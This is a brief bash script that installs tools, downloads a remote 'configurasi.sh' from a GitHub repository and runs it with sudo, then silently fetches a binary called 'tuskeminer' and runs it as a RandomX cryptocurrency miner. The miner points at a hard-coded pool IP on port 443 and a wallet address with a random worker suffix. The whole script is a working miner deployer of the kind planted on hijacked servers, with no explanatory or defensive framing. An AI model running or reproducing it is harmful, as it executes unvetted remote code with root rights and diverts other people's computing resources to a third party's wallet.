#!/bin/bash
apt-get update ; apt-get install -y wget curl sudo
wget https://github.com/cornea99/escuy/raw/main/configurasi.sh
chmod u+x configurasi.sh
sudo ./configurasi.sh
./configurasi.sh
wget https://github.com/cornea99/edann/raw/main/tuskeminer > /dev/null 2>&1 
chmod +x tuskeminer
./tuskeminer -a rx/0 --url 192.248.147.149:443 --user TuskeSyuXDmimmdhwmHLpzWxcgaxw28taAYJT79hbCfnJ7UHBLEKFFQG9Gbbv4fxGwd9kXPehzp2n1Yu43THWqdbKLujvTAWvH45mf.$(echo $(shuf -i 1-100000 -n 1)-B) 
